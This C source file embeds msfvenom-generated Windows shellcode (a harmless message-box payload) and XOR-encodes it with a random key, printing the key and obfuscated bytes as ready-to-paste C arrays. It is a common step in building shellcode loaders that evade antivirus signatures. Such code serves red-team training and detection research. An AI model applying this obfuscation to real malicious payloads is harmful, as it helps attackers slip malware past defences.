XOR Payload Encryption/Decryption

Code
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
//
// Payload initializing
// msfvenom -p windows/x64/messagebox TITLE='Payload Executed' TEXT='The payload was successfully executed!' -f c
//
// Raw bytes that main() feeds to xor_payload(). The comment above attributes
// them to an msfvenom messagebox payload. The array is initialised from a
// string literal, so it holds one implicit terminating NUL after the last
// listed byte.
unsigned char plaintext_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff"
"\xd5\x54\x68\x65\x20\x70\x61\x79\x6c\x6f\x61\x64\x20\x77"
"\x61\x73\x20\x73\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x6c"
"\x79\x20\x65\x78\x65\x63\x75\x74\x65\x64\x21\x00\x50\x61"
"\x79\x6c\x6f\x61\x64\x20\x45\x78\x65\x63\x75\x74\x65\x64"
"\x00";
// sizeof counts the implicit terminating NUL too, so this is one more than the
// number of bytes listed above. The loops in xor_payload() run to length - 1,
// which skips that extra byte.
unsigned int payload_len = sizeof( plaintext_payload );
// Number of key bytes main() generates. xor_payload() also reads this global to
// wrap the key index, so the key buffer it is given must hold at least this
// many bytes.
int key_len = 16;
// When true, main() calls xor_payload() a second time on the ciphertext with
// the same key.
bool test_decryption = true;
//
// Helper function(s)
//
// Forward declaration; the definition follows main(). The returned buffer is
// heap-allocated and is freed by the caller (see main()).
unsigned char* xor_payload( unsigned char *payload, unsigned char *key, unsigned int payload_length );
//
// Main function
//
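/*
 * Generates a key_len-byte XOR key, prints it as a C array literal, XORs
 * plaintext_payload with it through xor_payload() (which prints the result)
 * and, when test_decryption is set, XORs the result a second time with the
 * same key and checks that the round trip reproduces the original bytes.
 *
 * Returns 0 on success, 1 on a bad key length, an allocation failure or a
 * round-trip mismatch.
 */
int main( void )
{
    int i = 0;
    int status = 1;
    unsigned char *xor_key = NULL;
    unsigned char *xor_ciphertext = NULL;
    unsigned char *xor_decrypted = NULL;

    // key_len is used as an allocation size and as a modulus in xor_payload().
    if( key_len <= 0 )
    {
        fprintf( stderr, "[-] key_len must be positive\n" );
        return 1;
    }

    xor_key = calloc( (size_t)key_len, sizeof( unsigned char ) );
    if( xor_key == NULL )
    {
        fprintf( stderr, "[-] Failed to allocate the key buffer\n" );
        return 1;
    }

    //
    // Generate a randomized key
    //
    // NOTE(review): rand() seeded from the wall clock is predictable, and a
    // repeating-key XOR is an encoding rather than encryption: the key can be
    // recovered from the seed time or from any known plaintext bytes.
    srand( (unsigned int)time( NULL ) );
    for( i = 0; i < key_len; i++ )
    {
        xor_key[i] = (unsigned char)( rand() % 256 );
    }

    //
    // Print the key. Iterate by length, not up to the first zero byte: a random
    // key may contain 0x00, which would otherwise truncate the printed key while
    // xor_payload() still uses all key_len bytes.
    //
    printf( "\n" );
    printf( "[+] YOUR RANDOMLY GENERATED KEY: \n" );
    printf( "unsigned char xor_key[] = \"" );
    for( i = 0; i < key_len; i++ )
    {
        printf( "\\x%02X", xor_key[i] );
    }
    printf( "\";\n\n" );

    //
    // Call the helper XOR function
    //
    xor_ciphertext = xor_payload( plaintext_payload, xor_key, payload_len );
    if( xor_ciphertext == NULL )
    {
        fprintf( stderr, "[-] xor_payload failed\n" );
        goto cleanup;
    }

    if( test_decryption == true )
    {
        // Only the first payload_len - 1 bytes are transformed by xor_payload().
        size_t compare_len = payload_len > 0 ? (size_t)payload_len - 1 : 0;

        printf("\n\n");
        printf( "[!] TEST DECRYPTION BOOLEAN VARIABLE IS TRUE\n" );
        printf( "[!] THE FOLLOWING IS TESTING THE ENCRYPTION PROCESS BY DECRYPTING IT WITH THE SAME KEY\n" );
        printf( "[!] COMPARE IT TO THE ORIGINAL PAYLOAD IN THE CODE\n" );
        xor_decrypted = xor_payload( xor_ciphertext, xor_key, payload_len );
        if( xor_decrypted == NULL )
        {
            fprintf( stderr, "[-] xor_payload failed\n" );
            goto cleanup;
        }

        // Check the round trip in code instead of leaving it to a visual diff.
        if( memcmp( xor_decrypted, plaintext_payload, compare_len ) != 0 )
        {
            fprintf( stderr, "\n[-] ROUND TRIP DOES NOT MATCH THE ORIGINAL PAYLOAD\n" );
            goto cleanup;
        }
        printf( "\n[+] ROUND TRIP MATCHES THE ORIGINAL PAYLOAD\n" );
    }

    status = 0;

cleanup:
    free( xor_decrypted );
    free( xor_ciphertext );
    free( xor_key );
    return status;
}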
//
// XOR encryption/decryption helper function
//
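/*
 * XORs the first payload_length - 1 bytes of `payload` with a repeating key
 * and prints the result as a C string literal, 14 bytes per row. The same
 * call reverses the operation when given the output and the same key.
 *
 * payload         input bytes; must hold at least payload_length bytes
 * key             key bytes; must hold at least key_len bytes (key_len is the
 *                 file-level global, since the signature carries no key length)
 * payload_length  size of `payload`, counting one trailing byte that is not
 *                 transformed (the string-literal NUL in this file)
 *
 * Returns a calloc'd buffer of payload_length bytes that the caller must
 * free, or NULL on invalid arguments or allocation failure. The final byte
 * of the buffer is left as 0.
 */
unsigned char* xor_payload( unsigned char *payload, unsigned char *key, unsigned int payload_length )
{
    unsigned int i = 0;
    unsigned int data_len = 0;
    unsigned char *result = NULL;

    // payload_length == 0 would wrap payload_length - 1 to UINT_MAX, and a
    // non-positive key_len would divide by zero or wrap in the modulo below.
    if( payload == NULL || key == NULL || payload_length == 0 || key_len <= 0 )
    {
        return NULL;
    }
    data_len = payload_length - 1;

    result = calloc( payload_length, sizeof( unsigned char ) );
    if( result == NULL )
    {
        return NULL;
    }

    //
    // Doing the XOR functionality
    //
    for( i = 0; i < data_len; i++ )
    {
        result[i] = payload[i] ^ key[i % (unsigned int)key_len];
    }

    //
    // Print the result. The bound is the payload_length argument, not the
    // payload_len global, so a shorter buffer is never read past its end.
    //
    printf("[+] CORRESPONDING CIPHERTEXT PAYLOAD:\n");
    printf( "unsigned char payload [] =\n\"" );
    for( i = 0; i < data_len; i++ )
    {
        printf( "\\x%02X", result[i] );
        // Start a new row only when more bytes follow, so the literal never
        // ends with a dangling opening quote.
        if( ( i + 1 ) % 14 == 0 && i + 1 < data_len )
        {
            printf( "\"\n\"" );
        }
    }
    printf( "\";\n" );
    return result;
}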